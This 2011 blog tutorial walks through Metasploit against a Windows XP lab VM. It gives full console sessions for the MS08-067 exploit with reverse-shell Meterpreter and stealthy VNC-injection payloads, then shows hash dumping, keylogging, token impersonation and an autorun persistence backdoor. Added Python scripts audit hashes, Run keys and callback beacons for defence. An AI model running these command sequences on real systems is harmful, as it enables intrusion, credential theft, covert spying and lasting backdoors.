Tuesday, March 22, 2011

Metasploit - 101 with Meterpreter Payload & VNC Injection

The Metasploit framework is well known in the realm of exploit development. It is a standalone tool for security researchers, penetration testers and IDS/IPS developers. As of this writing, it ships with 640 exploit definitions and 215 payloads—a huge database. This article focuses on the more advanced features of the Metasploit framework.


A vulnerable Windows XP SP3 system is used here as the exploit target. The SMB vulnerability exploited is ms08_067_netapi (chosen for demonstration purposes only; any vulnerability, including Web-based exploits, can be used to gain shell access to the system). I am running XP SP3 as a virtual machine under Oracle VirtualBox 4.0.


101 with Meterpreter payload


The Meterpreter (Meta-Interpreter) payload is one of the most useful payloads provided by Metasploit. It can do a great deal on the target system, and is injected as follows.


The Windows target system's IP address is 192.168.56.101, and the host OS is Ubuntu 9.10 with the IP address 192.168.56.1. Hence, RHOST is set to 192.168.56.101 and LHOST to 192.168.56.1. The reverse_tcp variant of the Meterpreter payload makes the target connect back to the host system; the Meterpreter session opens after successful exploitation.


Terminal output:
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.101   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     192.168.56.1     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1123) at 2011-01-04 20:25:22 +0530
meterpreter >


Important commands in the Meterpreter session


checkvm
Entering this checks whether the target is a virtual machine. This is quite useful in environments with a large virtual infrastructure. Think of a case where the process implementing OS-level virtualisation (OpenVZ) on the physical host has a flaw: compromising it would give access to all virtual machines running on that physical server.


Terminal output:
meterpreter > run checkvm
[*] Checking if target is a Virtual Machine.....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter >


getcountermeasure
Entering this lists the countermeasures deployed on the target system. This is important because a signature-based detection system may be running on the target. It also reports firewall policies and anti-virus software.


Terminal output:
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*]         Domain profile configuration:
[*]         -------------------------------------------------------------------
[*]         Operational mode                  = Enable
[*]         Exception mode                     = Enable
[*]
[*]         Standard profile configuration (current):
[*]         -------------------------------------------------------------------
[*]         Operational mode                  = Disable
[*]         Exception mode                    = Enable
[*]
[*]         Local Area Connection firewall configuration:
[*]         -------------------------------------------------------------------
[*]         Operational mode                  = Enable
[*]
[*] Checking DEP Support Policy...
meterpreter >


get_local_subnets
Entering this gives information about the local subnets to which the target system belongs. This is useful for finding other systems on the same subnet.


Terminal output:
meterpreter > run get_local_subnets
Local subnet: 192.168.56.0/255.255.255.0
meterpreter >


get_application_list
Now, this is very cool. It gives us the whole list of applications installed on the target system, with their versions. We can use this to look up vulnerabilities specific to those application versions, for further exploitation.


Terminal output:
meterpreter > run get_application_list
Installed Applications
======================

 Name                                  Version
 ----                                  -------
 Adobe AIR                             1.5.3.9120
 Adobe Flash Player 10 Plugin          10.0.45.2
 Adobe Shockwave Player 11.5           11.5.7.609
 Acrobat.com                           2.0.0.0
 ImgBurn                               2.4.3.0
 Mozilla Firefox (3.5.9)               3.5.9 (en-US)
 Notepad++                             5.5
 NetBeans IDE 6.7.1                    6.7.1
 Overlook Fing                         1.3
 TrueCrypt                             6.2
 Wireshark 1.0.7                       1.0.7
 WinPcap 4.1.1                         4.1.0.1753
 Google Toolbar for Internet Explorer  1.0.0
 Microsoft .NET Framework 3.0          3.0.04506.30
 Java Auto Updater                     2.0.2.1
 Microsoft .NET Framework 2.0          2.0.50727
 Java(TM) 6 Update 20                  6.0.200
 HTTP Analyzer V5.2.1                  5.2.1
 Acrobat.com                           2.0.0
 Java DB 10.4.2.1                      10.4.2.1

meterpreter >


credcollect
This dumps the password hashes of the administrator and all other users. Later on, these hashes can be used to impersonate users, or the passwords can be recovered by brute-forcing them.


Terminal output:
meterpreter > run credcollect
[+] Collecting hashes...
Extracted: Administrator:560c5a660fgd552e7c3113b4a1a5e3a0:a38ad238851d3a6673a0047dc68ff8ca
Extracted: Guest:aad3b435b51404eeaad3b435b51fg4ee:31d6cfe0d16ae931b73c59d7e0c089c0
Extracted: HelpAssistant:ab57d8e30e1020c587e6449d434ca4eb:1ba62a18ffcd37a1754e13cae7afb3ed
Extracted: subodh:560c5a6604dd552e7c3113b4a1a5e3a0:a3jid238851d3a6673a0047dc68ff8ca
Extracted: SUPPORT_3io945a0s and S#:aad3b435b51404eeaad3b435b51404ee:2971f42b141f46b0bijq53cf0176eea3
[+] Collecting tokens...
HAHAHA\subodh
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
NT AUTHORITY\ANONYMOUS LOGON
meterpreter >

hashdump
Hashes for all users can also be dumped separately, for gaining access or for privilege escalation.

Terminal output:
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY a765f7a8d7535845f3bv7104aa69a333...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:560c5a6604dd552e7c3893b4a1a5e3a0:a38ad238851d3a6673a0047dc68ff8ca:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae93jj73c59d7e0c089c0:::
HelpAssistant:1000:ab57d8e30e1020c587e6449d434ca4eb:1ba62a18ffcd37a1754e13cae7afb3ed:::
SUPPORT_388945a0:1002:aad3b435b51124eeaad3b435b51404ee:2971f42b1lof46b0b30f53cf0176eea3:::
subodh:1003:560c5a6604dd552e7c3113b4a1anm3a0:a38ad238851d3a2373a0047dc68ff8ca:::
meterpreter >
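The credcollect and hashdump output above is in pwdump format (user:RID:LM hash:NTLM hash:::). From the defensive side, the same lines answer the questions an administrator should ask before an attacker does: is LM hashing still enabled, does any account have a blank password, and do accounts share a password? The audit below is an added example written for this article, not Metasploit code; the well-known empty-LM and empty-NTLM constants are real, and the sample hash values are constructed.

```python
"""Audit pwdump-format lines as printed by credcollect/hashdump (user:rid:LM:NTLM:::).
Added example for this article, not Metasploit code; sample hash values are constructed."""
import re
from collections import defaultdict

# Well-known constants: LM hash of an empty/disabled LM password, NTLM hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NTLM = "31d6cfe0d16ae931b73c59d7e0c089c0"

LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE)


def parse_hashdump(text):
    """Return one dict per well-formed hash line; [*] status lines and garbage are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append({"user": m["user"], "rid": int(m["rid"]),
                            "lm": m["lm"].lower(), "nt": m["nt"].lower()})
    return records


def audit(records):
    """Map user -> findings a defender would act on before the hashes are abused."""
    by_nt = defaultdict(list)          # NTLM hash -> users with that hash (password reuse)
    for r in records:
        by_nt[r["nt"]].append(r["user"])
    findings = {}
    for r in records:
        notes = []
        if r["lm"] != EMPTY_LM:
            notes.append("LM hash present (LM hashing enabled; trivially crackable offline)")
        if r["nt"] == EMPTY_NTLM:
            notes.append("blank password")
        if r["rid"] == 500:
            notes.append("built-in Administrator (RID 500)")
        others = sorted(u for u in by_nt[r["nt"]] if u != r["user"])
        if others and r["nt"] != EMPTY_NTLM:
            notes.append("password shared with: " + ", ".join(others))
        if notes:
            findings[r["user"]] = notes
    return findings


# Constructed sample in the same format as the hashdump output above (hash values are made up).
SAMPLE = """[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
backup:1003:0123456789abcdef0123456789abcdef:0123456789abcdef0123456789abcdef:::
svc_acct:1004:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
"""

if __name__ == "__main__":
    for user, notes in audit(parse_hashdump(SAMPLE)).items():
        print(user, "->", "; ".join(notes))
```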

keylogrecorder
This logs all keystrokes made on the target system to the .msf directory. The payload migrates live into the Explorer process, displays the PID of that process, and starts logging keystrokes. The getpid command shows which process the payload is attached to. The keystrokes are recorded in a text file at the path shown in the output.

Terminal output:
meterpreter > run keylogrecorder
[*] explorer.exe Process found, migrating into 1336
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /home/subodh/.msf3/logs/scripts/keylogrecorder/192.168.56.101_20110104.1024.txt
[*] Recording
[*] Saving last few keystrokes
[*] Interrupt
[*] Stopping keystroke sniffer...
meterpreter > getpid
Current pid: 1336
meterpreter >

shell
This throws back a shell to the host OS. Now we can run whatever we want—shell access compromises the whole system:

Terminal output:
meterpreter > shell
Process 988 created.
Channel 4 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\subodh>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 192.168.56.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
C:\Documents and Settings\subodh>exit
meterpreter >

Other features are also present in the Meterpreter payload, such as downloading and uploading files. These can be used to build automated exploit modules with Meterpreter.

Remote VNC injection
Using the Metasploit VNC injection payload, we can inject a VNC server remotely and have the display thrown back to the host system. Users of the target system will not notice that their display is being shared, though there is a trick—we have to disable the Metasploit courtesy shell that appears on the target system's display. If the courtesy shell is not disabled, a blue command prompt window is shown at the time of exploitation, as in Figure 1. This can warn the users of the target system and result in the attack being detected. After disabling the courtesy shell, the blue prompt is not displayed, as you can see in Figure 2. VNC injection can also be used when no user is logged in; in that case, there is no need to disable the courtesy shell.

A VNC viewer must be installed on the host system to see the VNC session thrown by the target system. I have xtightvncviewer installed on my Ubuntu 9.10 host. The VNCHOST parameter defaults to 127.0.0.1; we have to change it to the host-system interface IP on which the VNC session will be spawned—i.e., 192.168.56.1.

Terminal output:
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/vncinject/reverse_tcp
payload => windows/vncinject/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/vncinject/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   AUTOVNC   true             yes       Automatically launch VNC viewer if present
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port
   VNCHOST   127.0.0.1        yes       The local host to use for the VNC proxy
   VNCPORT   5900             yes       The local port to use for the VNC proxy

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > set VNCHOST 192.168.56.1
VNCHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > set DisableCourtesyShell TRUE
DisableCourtesyShell => TRUE
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.101   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/vncinject/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   AUTOVNC   true             yes       Automatically launch VNC viewer if present
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     192.168.56.1     yes       The listen address
   LPORT     4444             yes       The listen port
   VNCHOST   192.168.56.1     yes       The local host to use for the VNC proxy
   VNCPORT   5900             yes       The local port to use for the VNC proxy

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.56.101
[*] VNC Server session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1145) at 2011-01-04 22:52:21 +0530
[*] Starting local TCP relay on 192.168.56.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "hahaha"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding
CleanupSignalHandler called
ShmCleanup called
[*] VNC connection closed.
[*] VNC Server session 1 closed.
msf exploit(ms08_067_netapi) >

Figure 1: VNCInjection with courtesy shell enabled, by default

Figure 2: VNCInjection with courtesy shell disabled



Meterpreter incognito mode
The Incognito extension of Meterpreter is used to impersonate user tokens, both to achieve privilege escalation and to maintain access to the system. It lets us execute jobs with the access privileges of the impersonated user. We can also list processes with the ps command in Meterpreter, and with steal_token <pid> we can raise our privileges to those of the user who started that process. Incognito thus helps us reach parts of the system that are accessible only to users or administrators with higher privileges than the compromised user.

Terminal output:
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
HAHAHA\subodh
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token HAHAHA\\subodh
[+] Delegation token available
[+] Successfully impersonated user HAHAHA\subodh
meterpreter > getuid
Server username: HAHAHA\subodh
meterpreter > drop_token
Relinquished token, now running as: NT AUTHORITY\SYSTEM
meterpreter >

Meterpreter persistence mode
The persistence script (run persistence) is useful for keeping access to the system for further exploitation; it is like planting your own back-door for later access to that system. A Visual Basic script is installed on the target system and registered as an autorun, so it keeps connecting back to the host IP that was configured at the time of the first exploitation. From then on, every time the user logs in, the script throws a shell back to the configured remote IP.

Terminal output:
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.56.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /home/subodh/.msf3/logs/scripts/persistence/HAHAHA_20110104.4415/HAHAHA_20110104.4415.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=443
[*] Persistent agent script is 612577 bytes long
[+] Persisten Script written to C:\WINDOWS\TEMP\qabWKT.vbs
[*] Executing script C:\WINDOWS\TEMP\qabWKT.vbs
[+] Agent executed with PID 1200
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jwaGgfooIEPNZ
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jwaGgfooIEPNZ
meterpreter >

Persistence parameters

run persistence -U -i 5 -p 443 -r 192.168.56.1
-U = start the agent automatically when the user logs in.
-i = interval, in seconds, between connection attempts to the configured remote IP address.
-p = port to reach on the remote IP address for the Metasploit connection; i.e., the persistence process on the target system will try to connect to 192.168.56.1 on port 443 every 5 seconds.
-r = reachable remote IP address on which the handler is listening.
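The agent above leaves two host-side traces that an administrator can hunt for: a script dropped under C:\WINDOWS\TEMP with a random name, and a Run-key value with a generated name pointing at it. The scoring audit below is an added example for this article, not Metasploit code; the Run-key entries are constructed (the page shows the key name and script path but not the value data, which is assumed here to be the script path).

```python
"""Audit Run-key autorun entries for the traces the persistence agent leaves (script in TEMP,
generated value name). Added example, not Metasploit code; entries below are constructed."""
import os
import re

SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".bat", ".cmd", ".ps1"}
TEMP_DIRS = ("\\windows\\temp\\", "\\temp\\", "\\tmp\\")
# A drive-letter path ending in a short extension, terminated by a quote, whitespace or end of string.
PATH_RE = re.compile(r'[A-Za-z]:\\[^"<>|\r\n]+?\.[A-Za-z0-9]{1,4}(?=["\s]|$)')


def looks_generated(name):
    """Weak signal: mixed-case value name with few vowels, like the one the agent writes."""
    letters = re.sub(r"[^A-Za-z]", "", name)
    if len(letters) < 6:
        return False
    mixed = any(c.isupper() for c in letters) and any(c.islower() for c in letters)
    vowel_ratio = sum(c in "aeiouAEIOU" for c in letters) / len(letters)
    return mixed and vowel_ratio < 0.4


def audit_run_entries(entries):
    """entries: list of (value_name, command) pairs read from a Run key.
    Returns [(value_name, command, reasons)] for entries scoring at least 2 points:
    temp-directory launch = 2, script-host payload = 1, generated-looking name = 1."""
    flagged = []
    for name, cmd in entries:
        score, reasons = 0, []
        for path in PATH_RE.findall(cmd):
            low = path.lower()
            if any(t in low for t in TEMP_DIRS):
                score += 2
                reasons.append("launched from a temp directory: " + path)
            if os.path.splitext(low)[1] in SCRIPT_EXTS:
                score += 1
                reasons.append("script-host payload: " + path)
        if looks_generated(name):
            score += 1
            reasons.append("generated-looking value name")
        if score >= 2:
            flagged.append((name, cmd, reasons))
    return flagged


# Constructed HKCU\...\Run contents; the first entry mirrors the shape of the agent installed
# above (value data assumed to be the script path).
SAMPLE_RUN = [
    ("jwaGgfooIEPNZ", r"C:\WINDOWS\TEMP\qabWKT.vbs"),
    ("ctfmon.exe", r"C:\WINDOWS\system32\ctfmon.exe"),
    ("Updater", r'"C:\Program Files\Example\updater.exe" --tray'),
    ("setup", r"C:\Documents and Settings\subodh\Local Settings\Temp\setup.exe"),
]

if __name__ == "__main__":
    for name, cmd, reasons in audit_run_entries(SAMPLE_RUN):
        print(name, cmd, reasons, sep="\n  ")
```

The name heuristic is deliberately only one point: on its own it never flags an entry, so a legitimate mixed-case name is not reported unless it also launches something from a temp directory or runs a script.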

Moving on, we just need to load the simpler generic handler module (exploit/multi/handler) with the reverse_tcp payload and wait for the Meterpreter shell to appear. This stub exploit provides an interface for handling the incoming connection. When deploying the persistence script, remember to note the clean-up resource file it reports. This technique could be dangerous, as it leaves traces on the target system; be sure to clean up after exploitation. The script file and registry entries can be cleared once access to the target system is no longer required.

Terminal output:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.56.1     yes       The listen address
   LPORT     443              yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.56.1:443
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.56.101
[*] Meterpreter session 3 opened (192.168.56.1:443 -> 192.168.56.101:1049) at 2011-01-05 00:04:58 +0530
meterpreter >
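On the network side, the agent's callbacks every 5 seconds to port 443 are what a monitor can key on: port 443 blends in with HTTPS, but a fixed interval does not. The detector below groups connection attempts by (source, destination, port) and reports tuples whose spacing is nearly constant. It is an added example for this article, not Metasploit code, and the flow log lines are constructed.

```python
"""Spot fixed-interval callbacks such as those produced by `persistence -i 5 -p 443 -r <ip>`.
Added example for this article, not Metasploit code; the log lines are constructed."""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed log format: "<timestamp> <src> -> <dst>:<port> <flags>"
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<src>[\d.]+) -> (?P<dst>[\d.]+):(?P<port>\d+)")


def parse_flows(text):
    """Group connection-attempt timestamps by (src, dst, port)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            flows[(m["src"], m["dst"], int(m["port"]))].append(ts)
    return flows


def find_beacons(flows, min_hits=4, max_jitter=0.2):
    """Return [(key, mean_interval_seconds)] for tuples whose inter-arrival gaps are regular.
    max_jitter is the allowed coefficient of variation (population stdev / mean)."""
    beacons = []
    for key, times in flows.items():
        if len(times) < min_hits:
            continue
        times = sorted(times)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        if statistics.pstdev(gaps) / mean <= max_jitter:
            beacons.append((key, round(mean, 1)))
    return beacons


# Constructed sample: the agent's 5-second callbacks to 192.168.56.1:443 mixed with
# irregular, user-driven connections to a web server.
SAMPLE_LOG = """2011-01-05 00:04:30 192.168.56.101 -> 192.168.56.1:443 SYN
2011-01-05 00:04:31 192.168.56.101 -> 10.0.0.5:80 SYN
2011-01-05 00:04:33 192.168.56.101 -> 10.0.0.5:80 SYN
2011-01-05 00:04:35 192.168.56.101 -> 192.168.56.1:443 SYN
2011-01-05 00:04:40 192.168.56.101 -> 192.168.56.1:443 SYN
2011-01-05 00:04:45 192.168.56.101 -> 192.168.56.1:443 SYN
2011-01-05 00:04:50 192.168.56.101 -> 192.168.56.1:443 SYN
2011-01-05 00:04:52 192.168.56.101 -> 10.0.0.5:80 SYN
2011-01-05 00:04:54 192.168.56.101 -> 10.0.0.5:80 SYN
"""

if __name__ == "__main__":
    for (src, dst, port), interval in find_beacons(parse_flows(SAMPLE_LOG)):
        print(f"beacon candidate: {src} -> {dst}:{port} every {interval}s")
```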

That's all for now, but this is just a start to the endless possibilities for exploitation. I will be back soon with more exciting stuff for you guys.


Note: This article was posted by me in the Linux For You magazine, February 2011 issue. Linux For You is the leading open-source and Linux magazine in the Asia region.
